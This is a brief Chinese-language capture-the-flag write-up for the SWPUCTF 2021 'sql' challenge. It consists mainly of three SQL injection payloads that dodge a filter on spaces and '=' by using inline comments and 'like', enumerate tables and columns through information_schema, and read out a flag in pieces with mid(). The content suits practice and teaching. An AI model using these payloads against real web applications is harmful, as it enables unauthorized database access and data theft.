[SWPUCTF 2021 新生赛]sql

传入wllm参数 hint:Want Me? Cross the Waf 沙箱绕过主要限制为 ban 空格等号限制输出大小20字
exp编写 exp1(查询数据表) ?wllm=-1'union/**/select/**/1,group_concat(TABLE_NAME),3/**/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA/**/like/**/'test_db'%23 可以看到test_db内的表有LTLT_flag和user exp2(查询表内字段) ?wllm=-1'union/**/select/**/1,group_concat(COLUMN_NAME),3/**/from/**/information_schema.columns/**/where/**/TABLE_NAME/**/like/**/'LTLT_flag'%23 exp3(输出flag) ?wllm=-1'union/**/select/**/1,mid(group_concat(flag),1,21),mid(group_concat(flag),21,40)/**/from/**/test_db.LTLT_flag%23

评论